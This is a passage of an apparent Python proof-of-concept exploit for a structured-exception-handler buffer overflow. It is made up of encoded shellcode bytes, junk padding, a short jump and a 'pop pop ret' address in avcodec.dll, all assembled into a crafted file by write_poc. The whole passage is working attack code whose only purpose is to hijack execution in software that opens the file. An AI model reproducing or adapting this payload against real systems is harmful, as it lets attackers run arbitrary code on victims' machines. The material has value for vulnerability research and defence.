shellcode += "\x4c\x75\x70\x39\x51\x48\x4f\x46\x6d\x67\x71\x4b\x77"
shellcode += "\x7a\x42\x48\x72\x63\x62\x30\x57\x6e\x6b\x51\x42\x74"
shellcode += "\x50\x4c\x4b\x61\x5a\x77\x4c\x6c\x4b\x52\x6c\x57\x61"
shellcode += "\x62\x58\x7a\x43\x53\x78\x45\x51\x68\x51\x43\x61\x4c"
shellcode += "\x4b\x72\x79\x55\x70\x56\x61\x38\x53\x4e\x6b\x67\x39"
shellcode += "\x46\x78\x5a\x43\x65\x6a\x37\x39\x4c\x4b\x36\x54\x6e"
shellcode += "\x6b\x57\x71\x7a\x76\x44\x71\x49\x6f\x6e\x4c\x6f\x31"
shellcode += "\x58\x4f\x36\x6d\x56\x61\x48\x47\x66\x58\x39\x70\x73"
shellcode += "\x45\x69\x66\x66\x63\x53\x4d\x5a\x58\x47\x4b\x53\x4d"
shellcode += "\x65\x74\x34\x35\x6d\x34\x70\x58\x6c\x4b\x61\x48\x35"
shellcode += "\x74\x53\x31\x69\x43\x65\x36\x4e\x6b\x74\x4c\x30\x4b"
shellcode += "\x4c\x4b\x46\x38\x67\x6c\x35\x51\x48\x53\x6e\x6b\x35"
shellcode += "\x54\x6e\x6b\x65\x51\x7a\x70\x4f\x79\x37\x34\x45\x74"
shellcode += "\x75\x74\x43\x6b\x33\x6b\x33\x51\x73\x69\x51\x4a\x36"
shellcode += "\x31\x6b\x4f\x39\x70\x51\x4f\x43\x6f\x73\x6a\x6e\x6b"
shellcode += "\x54\x52\x6a\x4b\x4e\x6d\x53\x6d\x51\x7a\x77\x71\x4c"
shellcode += "\x4d\x6c\x45\x4e\x52\x53\x30\x47\x70\x75\x50\x52\x70"
shellcode += "\x45\x38\x54\x71\x4e\x6b\x70\x6f\x6e\x67\x39\x6f\x58"
shellcode += "\x55\x4d\x6b\x4a\x50\x78\x35\x4d\x72\x36\x36\x43\x58"
shellcode += "\x79\x36\x7a\x35\x6f\x4d\x4d\x4d\x4b\x4f\x79\x45\x37"
shellcode += "\x4c\x77\x76\x51\x6c\x75\x5a\x6b\x30\x79\x6b\x49\x70"
shellcode += "\x62\x55\x37\x75\x6d\x6b\x61\x57\x35\x43\x74\x32\x52"
shellcode += "\x4f\x30\x6a\x55\x50\x31\x43\x4b\x4f\x69\x45\x32\x43"
shellcode += "\x43\x51\x32\x4c\x50\x63\x34\x6e\x61\x75\x62\x58\x50"
shellcode += "\x65\x67\x70\x41\x41"
junk = '\x41' * 0x1e
jmp = '\xeb\x20\x41\x41'
nseh = '\x37\x27\x78\x66' #pop pop ret -> avcodec.dll
buffer = buf + jmp + nseh + junk + shellcode
write_poc(fname, buffer)